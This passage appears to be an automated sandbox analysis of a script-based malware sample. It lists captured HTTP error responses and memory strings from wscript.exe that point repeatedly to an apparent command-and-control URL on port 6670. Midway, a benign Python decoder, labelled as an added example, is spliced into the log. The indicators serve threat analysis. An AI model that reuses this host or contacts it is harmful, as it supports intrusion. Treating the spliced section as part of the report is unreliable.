56 42 3d 64 2f 6e 73 74 45 66 4a 6a 36 45 71 48 49 61 6f 36 33 46 4a 30 73 39 47 75 71 41 39 35 4b 51 48 6f 71 74 61 6b 74 6a 72 39 2f 70 32 6a 48 77 6c 6b 43 51 33 79 68 43 45 6f 31 53 55 72 53 51 6b 35 6e 5a 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 77 77 77 2e 6a 6c 62 77 61 74 65 72 64 61 6d 61 67 65 72 65 70 61 69 72 73 65 61 74 74 6c 65 2e 63 6f 6d 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a Data Ascii: <!DOCTYPE HTML 
PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /np8s/?4hM4=o4B0f&amp;zVB=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo1SUrSQk5nZl was not found on this server.<HR><I>www.jlbwaterdamagerepairseattle.com</I></BODY></HTML>
Source: global traffic HTTP traffic detected:
HTTP/1.1 403 Forbidden
Server: nginx
Date: Fri, 27 May 2022 16:43:48 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Fri, 27 May 2022 16:44:17 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: MISS
Server: cloudflare
CF-RAY: 712036e27e819bb3-FRA
Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Fri, 27 May 2022 16:44:17 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 712036e25f3e6964-FRA
Content-Encoding: gzip
Data Raw: 66 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 54 90 c1 6e c2 30 10 44 ef fe 8a 29 e7 96 85 8a a3 65 a9 25 41 20 a5 14 55 e1 d0 a3 c1 5b 6c 29 d8 d4 d9 14 e5 ef ab 84 4a 6d af b3 6f 76 67 56 df 15 af cb fa 7d 57 62 5d bf 54 d8 ed 9f ab cd 12 93 07 a2 4d 59 af 88 8a ba b8 4d 1e a7 33 a2 72 3b 31 4a 7b 39 37 46 7b b6 ce 28 2d 41 1a 36 8b d9 02 db 24 58 a5 2e 3a 4d 37 51 69 1a 21 7d 48 ae 1f 7c 73 f3 87 f1 73 a3 f4 c5 d4 9e 91 f9 b3 e3 56 d8 61 ff 56 e1 6a 5b c4 24 f8 18 38 a4 08 f1 a1 45 cb f9 8b f3 54 d3 65 b4 3d 39 17 24 a4 68 9b a6 bf 87 c5 bf 00 8a 73 4e 79 5c c4 f1 98 ba 28 9c d9 e1 ea 43 c3 90 dc 87 78 82 24 74 2d c3 46 94 03 5c a4 63 77 e6 28 83 ee 6d 74 03 f8 9b ec e7 2c 8d 45 34 8d 0f 50 df 00 00 00 ff ff 03 00 59 3c e4 fe 3b 01 00 00 0d 0a
Data Ascii: f5Tn0D)e%A U[l)JmovgV}Wb]TMYM3r;1J{97F{(-A6$X.:M7Qi!}H|ssVaVj[$8ETe=9$hsNy\(Cx$t-F\cw(mt,E4PY<;
Source: global traffic HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Fri, 27 May 2022 16:45:04 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 279
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Fri, 27 May 2022 16:45:06 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 279
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Fri, 27 May 2022 16:45:08 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 279
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected:
HTTP/1.1 404 Not Found
Connection: close
content-type: text/html
content-length: 252
content-encoding: gzip
vary: Accept-Encoding,User-Agent,User-Agent
date: Fri, 27 May 2022 16:45:15 GMT
server: LiteSpeed
Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4c 8b b1 0e 82 40 10 05 fb fb 8a 95 5e 17 0c e5 66 13 61 97 dc 25 27 10 b3 14 f4 5c 42 25 51 e1 ff 0d d2 58 be 99 79 74 92 ae b6 b1 57 f0 76 8f d0 0f 55 0c 35 64 67 c4 a0 d6 20 8a c9 61 ae 97 1c 51 db 8c 1d ed 9b c9 eb 4d d8 91 05 8b ca 65 5e 42 bb ac d0 2c db 73 22 3c a0 23 fc 45 54 75 32 ee bf 82 ff 1a 5f b0 b3 39 c1 3b bd b6 f4 59 d3 04 c3 23 c2 17 00 00 ff ff 04 c1 bb 11 80 20 0c 00 d0 de 29 32 01 b4 16 1c b5 b6 6e 10 25 2a 1e bf 4b a2 59 df f7 7c 1b b3 78 30 14 68 5d e1 ec 6f 4b d0 1b e8 9d 05 84 f8 23 76 53 58 b6 38 85 35 9a 99 7b ca 6e a8 c4 09 2b 5e c4 34 30 b3 10 aa 16 72 47 af 3f 00 00 00 ff ff b2 d1 f7 b4 e3 b2 d1 77 f2 77 89 b4 b3 d1 f7 08 f1 f5 b1 e3 1a c9 00 00 00 00 ff ff 03 00 1f 08 e8 aa f0 01 00 00
Data Ascii: L@^fa%'\B%QXytWvU5dg aQMe^B,s"<#ETu2_9;Y# )2n%*KY|x0h]oK#vSX85{n+^40rG?ww
Source: global traffic HTTP traffic detected:
HTTP/1.1 404 Not Found
Connection: close
content-type: text/html
content-length: 252
content-encoding: gzip
vary: Accept-Encoding,User-Agent,User-Agent
date: Fri, 27 May 2022 16:45:15 GMT
server: LiteSpeed
Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4c 8b b1 0e 82 40 10 05 fb fb 8a 95 5e 17 0c e5 66 13 61 97 dc 25 27 10 b3 14 f4 5c 42 25 51 e1 ff 0d d2 58 be 99 79 74 92 ae b6 b1 57 f0 76 8f d0 0f 55 0c 35 64 67 c4 a0 d6 20 8a c9 61 ae 97 1c 51 db 8c 1d ed 9b c9 eb 4d d8 91 05 8b ca 65 5e 42 bb ac d0 2c db 73 22 3c a0 23 fc 45 54 75 32 ee bf 82 ff 1a 5f b0 b3 39 c1 3b bd b6 f4 59 d3 04 c3 23 c2 17 00 00 ff ff 04 c1 bb 11 80 20 0c 00 d0 de 29 32 01 b4 16 1c b5 b6 6e 10 25 2a 1e bf 4b a2 59 df f7 7c 1b b3 78 30 14 68 5d e1 ec 6f 4b d0 1b e8 9d 05 84 f8 23 76 53 58 b6 38 85 35 9a 99 7b ca 6e a8 c4 09 2b 5e c4 34 30 b3 10 aa 16 72 47 af 3f 00 00 00 ff ff b2 d1 f7 b4 e3 b2 d1 77 f2 77 89 b4 b3 d1 f7 08 f1 f5 b1 e3 1a c9 00 00 00 00 ff ff 03 00 1f 08 e8 aa f0 01 00 00
Data Ascii: L@^fa%'\B%QXytWvU5dg aQMe^B,s"<#ETu2_9;Y# )2n%*KY|x0h]oK#vSX85{n+^40rG?ww
Source: global traffic HTTP traffic detected:
HTTP/1.1 404 Not Found
Connection: close
content-type: text/html
content-length: 584
date: Fri, 27 May 2022 16:45:15 GMT
server: LiteSpeed
vary: User-Agent,User-Agent
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 70 38 73 2f 3f 34 68 4d 34 3d 6f 34 42 30 66 26 61 6d 70 3b 7a 56 42 3d 64 2f 6e 73 74 45 66 4a 6a 36 45 71 48 49 61 6f 36 33 46 4a 30 73 39 47 75 71 41 39 35 4b 51 48 6f 71 74 61 6b 74 6a 72 39 2f 70 32 6a 48 77 6c 6b 43 51 33 79 68 43 45 6f 31 53 55 72 53 51 6b 35 6e 5a 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 77 77 77 2e 6a 6c 62 77 61 74 65 72 64 61 6d 61 67 65 72 65 70 61 69 72 73 65 61 74 74 6c 65 2e 63 6f 6d 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /np8s/?4hM4=o4B0f&amp;zVB=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo1SUrSQk5nZl was not found on this server.<HR><I>www.jlbwaterdamagerepairseattle.com</I></BODY></HTML>
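The Cloudflare and LiteSpeed 404 bodies above are printed only as a hex dump plus a lossy ASCII rendering, and two of them are gzip-compressed (one is chunked as well), so their ASCII column is line noise. The decoder below is an added example, not part of this report or of any sandbox vendor's tooling: it converts a Data Raw dump to bytes, reassembles chunked transfer encoding, and inflates gzip, returning partial data instead of raising when a dump is cut off mid-stream, which sandbox captures often are. The sample body it ships with is constructed inline (an HTML page that a hypothetical server gzip-compressed and sent chunked) and is not copied from the report; paste the report's own hex into `decode_body` to recover the real pages.

```python
"""Decode a sandbox 'Data Raw' HTTP body: hex -> de-chunk -> inflate.

Added example; the sample input below is constructed, not taken from the
report. Every stage tolerates truncation so a cut-off dump still yields
whatever bytes it contains.
"""
import gzip
import zlib


def hex_dump_to_bytes(hex_dump: str) -> bytes:
    """Turn '3c 68 74 6d 6c ...' (any whitespace between pairs) into raw bytes."""
    return bytes.fromhex("".join(hex_dump.split()))


def dechunk(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body.

    Stops at the zero-size last-chunk, or quietly when the dump ends
    mid-stream, so a truncated capture still returns the data it holds.
    """
    out = bytearray()
    pos = 0
    while pos < len(body):
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            break                                   # chunk-size line cut off
        size_field = body[pos:eol].split(b";")[0]   # drop chunk extensions
        try:
            size = int(size_field.decode("ascii").strip(), 16)
        except ValueError:                          # covers UnicodeDecodeError too
            break                                   # not a chunk header at all
        if size == 0:
            break                                   # last-chunk; trailers ignored
        pos = eol + 2
        out += body[pos:pos + size]                 # short slice if dump is truncated
        pos += size + 2                             # skip the CRLF closing the chunk
    return bytes(out)


def inflate(data: bytes) -> bytes:
    """Inflate gzip or zlib data; 32 + MAX_WBITS auto-detects the header.

    A decompressobj hands back whatever it could decode from a truncated
    stream instead of raising, and the 00 00 ff ff sync-flush markers seen
    in the LiteSpeed dumps are just empty stored blocks it walks through.
    """
    return zlib.decompressobj(32 + zlib.MAX_WBITS).decompress(data)


def decode_body(hex_dump: str, chunked: bool = False, content_encoding: str = "") -> bytes:
    """Undo the transport layers in reverse order: framing first, then compression."""
    data = hex_dump_to_bytes(hex_dump)
    if chunked:
        data = dechunk(data)
    if content_encoding.lower() == "gzip":
        data = inflate(data)
    return data


# Constructed sample (not from the report): a 404 page gzip-compressed and
# sent chunked, rendered the way the report prints a Data Raw column.
SAMPLE_HTML = (b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n'
               b"<html><head><title>404 Not Found</title></head><body>\n"
               b"<h1>Not Found</h1><p>The requested URL was not found on this server.</p>\n"
               b"</body></html>\n")
SAMPLE_GZ = gzip.compress(SAMPLE_HTML)
SAMPLE_HEX = (f"{len(SAMPLE_GZ):x}\r\n".encode() + SAMPLE_GZ + b"\r\n0\r\n\r\n").hex(" ")

# The same dump with its second half missing, as a cut-off capture would look.
_tokens = SAMPLE_HEX.split()
TRUNCATED_HEX = " ".join(_tokens[: len(_tokens) // 2])


def demo():
    """Decode the complete and the truncated sample; returns (full, partial)."""
    full = decode_body(SAMPLE_HEX, chunked=True, content_encoding="gzip")
    partial = decode_body(TRUNCATED_HEX, chunked=True, content_encoding="gzip")
    return full, partial


if __name__ == "__main__":
    full, partial = demo()
    print(full.decode())
    print(f"truncated dump recovered {len(partial)} of {len(full)} bytes")
```

For the report's rows, pass `chunked=True` for the Cloudflare responses (the Data Raw starts with the chunk size, `31 33 62 0d 0a` = `13b`) and `content_encoding="gzip"` for the dumps that begin with `1f 8b`.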
Source: wscript.exe, 00000009.00000002.972899634.000002A0FE18A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.964440619.000002A0FC389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/
Source: wscript.exe, 00000009.00000003.512513259.000002A0FE165000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/KCQlm
Source: wscript.exe, 00000009.00000003.797460057.000002A0FE3A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.798562853.000002A0FE392000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.798358475.000002A0FE357000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre
Source: wscript.exe, 00000009.00000002.973024572.000002A0FE375000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre$s
Source: wscript.exe, 00000005.00000003.919362750.000002CA03732000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.920503026.000002CA0373B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre)
Source: wscript.exe, 00000009.00000002.955051076.000002A0FC2F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre)1
Source: wscript.exe, 00000005.00000002.995617824.000002CA05530000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966667032.000002A0FDD80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre-Agent((
Source: wscript.exe, 00000007.00000002.961947849.0000019175800000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre-Agent((m
Source: wscript.exe, 00000002.00000003.896087228.0000015597A8A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.703640260.0000015597A27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre0
Source: wscript.exe, 00000002.00000003.896380234.0000015597A27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.961961202.0000015597A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.703640260.0000015597A27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre0D
Source: wscript.exe, 00000005.00000003.755909949.000002CA03738000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre1
Source: wscript.exe, 00000005.00000003.921517592.000002CA056E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.999768148.000002CA056E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre2
Source: wscript.exe, 00000007.00000002.973441987.0000019175C0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre4
Source: wscript.exe, 00000005.00000003.919796248.000002CA03757000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.921500706.000002CA03757000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.755644912.000002CA03755000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.937481985.0000019175C88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.773445797.0000019175C51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938372471.0000019175C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.774215223.0000019175C5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.937512517.0000019175C5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.973084193.000002A0FE3BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.797669252.000002A0FE3BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.798581012.000002A0FE39B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.796772281.000002A0FE3B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.797946340.000002A0FE38D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.796252633.000002A0FE3B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.798562853.000002A0FE392000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre63209-4053062332-100
Source: wscript.exe, 00000002.00000003.895989838.0000015597AB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.970059033.0000015597A51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre63209-4053062332-1000
Source: wscript.exe, 00000009.00000003.795747446.000002A0FE3C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre9
Source: wscript.exe, 00000009.00000003.798741707.000002A0FE393000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.797946340.000002A0FE38D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.798562853.000002A0FE392000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrecomputerNUMBER_OF_H
